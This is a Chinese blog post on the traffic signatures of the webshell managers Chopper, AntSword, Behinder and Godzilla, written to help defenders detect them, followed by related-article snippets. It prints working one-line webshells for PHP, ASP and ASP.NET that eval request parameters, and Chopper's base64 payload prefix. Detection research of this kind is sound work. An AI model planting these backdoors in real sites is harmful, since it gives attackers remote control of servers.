webshell管理工具及其流量特征分析

最新推荐文章于 2026-04-01 03:15:22 发布
原创 最新推荐文章于 2026-04-01 03:15:22 发布 · 1.8k 阅读 · 12
标签
#webshell #冰蝎 #菜刀 #哥斯拉
本文详细分析了四种常见的Webshell管理工具——菜刀、蚁剑、冰蝎和哥斯拉,探讨了它们各自的流量特征,包括连接方式、数据包分析、加密机制和响应格式。这些工具在渗透测试和安全研究中的应用及识别要点得以揭示。

webshell管理工具及其流量特征分析

——

对常见四款webshell进行分析,对工具连接流量有个基本认识。
——

中国菜刀(Chopper)流量特征

是一款经典的网站管理工具,有文件管理、数据库管理、虚拟终端等功能。
流量特征十分明显,如今安全设备基本可以识别到菜刀的流量。基本是在安全教学中使用。

github项目地址:https://github.com/raddyfiy/caidao-official-version

菜刀使用的webshell ,特征十分明显
常见一句话(Eval):
PHP一句话:

<?php @eval($_POST['caidao']);?>

ASP一句话:

<%eval request(“caidao”)%>

asp.net一句话:

<%@ Page Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

请求体中传递的payload为base64编码,并且存在固定的

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

响应文的格式为

X@Y
结果

最低0.47元/天 解锁文章
webshell客户端流量特征
buffedon的博客
07-14 5347
webshell客户端流量特征概述:1. 冰蝎2. 中国菜刀2011,2014版本2016版本3. Cknife4. 蚁剑5. 哥斯拉 webshell客户端 用于webshell后门和攻击者之间的通信程序,我们可以通过webshell客户端的流量来判断服务器上是否存在Webshell后门。 概述: 中国菜刀流量特征比较明显,2011,2014版本中,流量中有的php代码,asp代码是明文形式,jsp代码有固定格式,容易被检测出来。2016版本隐蔽性增强,对php,asp代码增加了混淆,还对ASP代码进行
Webshell工具的流量特征分析菜刀,蚁剑,冰蝎哥斯拉
热门推荐
告白的博客
05-31 3万+
0x00 前言 使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 0x02 ......
解密Webshell流量:哥斯拉冰蝎的加密对抗实战
最新发布
weixin_30500105的博客
04-01 360
本文深入分析了加密Webshell工具哥斯拉冰蝎流量特征与加密机制,提供了实战解密技巧和防御方案。通过解析PHP、JSP等语言的加密差异及动态密钥协商机制,帮助安全人员有效识别和拦截加密Webshell攻击,提升网络安全防护能力。
常见的webshell工具的流量特征
m0_66458291的博客
01-19 4275
常见的webshell工具流量的简单分析菜刀、蚁剑、冰蝎哥斯拉
常见的webshell流量特征和检测思路
weixin_45585955的博客
04-11 8637
所以分析如上:该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。最后传给cmd的这些流量字符中有自己的特征,1、都是系统命令;2、必须以分号结尾;至此,冰蝎成为了一个完美的开箱即用的工具,本体内存马免杀,流量免杀,功能齐全,兼容性好,在连续几年的攻防演练中,成为最热门的工具。
三种常见webshell工具的流量特征分析
mashiro_hibiki的博客
04-10 2156
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的,也可以将其称做为一种网页后门。
webshell管理工具流量分析
2201_75472578的博客
09-10 1131
webshell何时被部署-->通过什么洞打进来-->找到webshell的存放位置-->获取webshell的文件-->通过提取文件中的key(密钥)为连接密码32位md5值的前16位作为我们AES的解密密钥,对流量进行解密,进一步还原全流量进行回溯,了解攻击者后续做了那些行为。5. 端口特征:冰蝎webshell建立连接时,java也会与目的主机建立TCP连接,每次连接使用本地端口都在49700左右,每建立一次新连接,端口依次增加。q=0.01(非明显特征点,因为请求包的请求头可。
常用的webshell工具流量分析
miaositekali的博客
12-13 2650
本文分析菜刀、蚁剑、冰蝎哥斯拉等常见Webshell工具的流量特征菜刀流量特征明显,采用base64+url编码,容易解密;蚁剑可通过自定义编码器和UA头隐藏特征,但部分版本仍存在明显标识;冰蝎3.0采用AES128加密,流量分三个阶段,具有text/html等弱特征;哥斯拉支持多种加密方式,Cookie末尾分号是其独特特征。文章详细介绍了各工具的解密流程,指出菜刀最易检测,而蚁剑和冰蝎通过加密可增强隐蔽性。同时提供了相关解密工具和方法,有助于安全人员识别和防御Webshell攻击。
day7 文件上传
qq_61883924的博客
11-20 1070
JavaScript 前端校验防御手段:在前端通过 JavaScript 对文件类型、大小、扩展名等进行校验。绕过方法禁用 JavaScript,或使修改 JavaScript 代码。直接构造请求。不使用浏览器,但是不常用。
流量种类的粗略学习
2402_87221233的博客
09-05 1187
使得题目中的流量参数看起来是。
Webshell管理工具流量特征
w2361734601的博客
04-29 2952
Webshell流量特征因工具而异,但通常包含加密、固定参数或异常协议等行为。通过结合特征检测和行为分析,可有效识别攻击。防御需多层联动,从流量监控到文件管理,形成完整防护体系。​​防御核心​​:早发现、早阻断、早溯源。
webshell工具流量特征
qq_52973916的博客
08-11 632
这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码,但是有的客户端会将这段编码或者加密,而蚁剑是明文,所以较好发现,同时蚁剑也有eval这种明显的特征。冰蝎webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。由于蚁剑中包含了很多加密、绕过插件,所以导致很多流量被加密后无法识别,但是蚁剑混淆加密后还有一个比较明显的特征,即为参数名大多以。冰蝎中,任何请求,最终都会调用。
常见webshell工具的流量特征
weixin_75158417的博客
03-03 1561
使用AES加密+base64编码,AES使用动态密钥对通信进行加密,进行请求时内置了十几个U-A头,每次请求时会随机选择其中一个。因此当发现一个IP的请求头中的u-a头在不断的发生变化,就有可能是冰蝎。因此当发现一个ip的请求头中的u-a在频繁变换,就可能是冰蝎。3.0连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream。使用AES加密+base64编码,取消了2.0的动态获取密钥,使用固定的连接密钥,随机数 结果 随机数。
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 2029
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀和蚁剑这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
Webshell的各种流量特征超级详细版
BanDaPao的博客
06-23 2374
冰蝎:动态密钥幽灵,AES全程加密伪装二进制流,心跳包维持长连接。 哥斯拉:内存马刺客,MD5分段响应藏密文,Cookie分号留痕,文件分片遁形。 蚁剑:明文刺客,_0x参数+Base64编码暴露马脚,高危函数高频触发。 天蝎:.NET伪装大师,HTML/JS混合免杀,密钥硬编码却隐于乱码。 💡 核心差异:从明文暴露(蚁剑)→ 动态加密(冰蝎)→ 协议定制(哥斯拉)→ 代码隐身(天蝎),攻防博弈永不停歇!
【护网蓝队】【初级监测】如何识别shell流量特征
m0_66160077的博客
09-24 1344
②攻击者通过GET方式请求服务器密钥,在url会有pass=(GET /hackable/uploads/shell.php?pass=300 HTTP/1.1),当我们输入命令的时候,请求方式会变成POST,cookie会存在pass=和PHPSessid=xxxx。③请求ua头是以java/为主(User-Agent: Java/1.8.0_131)冰蝎2.0版本默认Accept字段的值很特殊,而且每个阶段都一样,都是很长的一段。③请求中返回包的状态码是200,返回内容是16位的密钥。
简谈webshell流量特征笔记
m0_58116751的博客
04-25 725
如果能看到webshell流量的display_errors未经编码就可以证明webshell连接工具为蚁剑,流量大部分内容是蚁剑webshell基本功能的执行函数,要分析攻击者执行的部分就要找到die()函数,看它后面的内容,这之中的内容定义了几个变量,变量数值里面有包含混淆字符,默认为两个,也可能是多个,去除混淆字符后再进行base64解码,就能看到攻击命令,服务器的返回内容没有经过编码可以直接分析。一、webshell流量特征分析。2.中国蚁剑webshell流量。1.冰蝎webshell流量。
蚁剑流量分析
m0_56937298的博客
04-03 6742
通过Wireshark分析蚁剑一句话木马
常见webshell工具流量特征分析(哥斯拉冰蝎、蚁剑、菜刀)
weixin_45971758的博客
06-23 6958
message 是一段超极长的字符串,分析冰蝎请求中的 PHP 代码,发现他就是 content 经过 base64 -> aes 加密后生成的,作用和请求中的 content 一致都是绕过 $Content-Length。冰蝎webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。content:“浏览器版本”。流量解密过程: 解AES密钥为(连接密码的MD5的前16位) --> 解base64两次。
WebShell流量特征检测_哥斯拉
徐徐徐的博客
09-05 2341
XOR运算在逻辑运算之中,除了AND和OR,还有一种XOR运算,中文称为"异或运算"。它的定义是:两个值相同时,返回false,否则返回true。也就是说,XOR可以用来判断两个值是否不同。JavaScript语言的二进制运算,有一个专门的 XOR 运算符,写作^。上面代码中,如果两个二进制位相同,就返回0,表示false;否则返回1,表示true。XOR加密XOR运算有一个很奇妙的特点:如果对一个值连续做两次 XOR,会返回这个值本身。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值